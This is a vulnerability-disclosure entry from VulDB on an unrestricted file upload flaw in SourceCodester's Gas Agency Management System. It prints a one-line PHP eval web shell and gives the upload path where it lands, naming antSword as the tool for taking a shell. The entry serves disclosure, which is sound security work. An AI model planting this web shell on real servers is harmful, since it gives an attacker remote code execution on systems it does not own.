Submit #43453: sourcecodester Gas Agency Management System /gasmark/product.php exists unrestricted uploadinfo

Titlesourcecodester Gas Agency Management System /gasmark/product.php exists unrestricted upload
DescriptionFile uploading is not filtered, and uploading a sentence is caused by a Trojan horse getshell upload shell like this ```php <?php @eval($_POST['shell']);?> ``` https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/oneWorld.png Then we check it https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/Check.png then we can see it in /gasmark/assets/myimages/oneWord.php Use antSword to getshell https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/getShell.png The source code website is https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html
Source⚠️ https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html
User
 Drunkbaby (UID 30821)
Submission08/11/2022 12:52 (4 years ago)
Moderation08/11/2022 13:44 (52 minutes later)
StatusAccepted
VulDB entry206173 [SourceCodester Gas Agency Management System oneWord.php shell unrestricted upload]
Points20

PreviousOverviewNext

Do you know our Splunk app?

Download it now for free!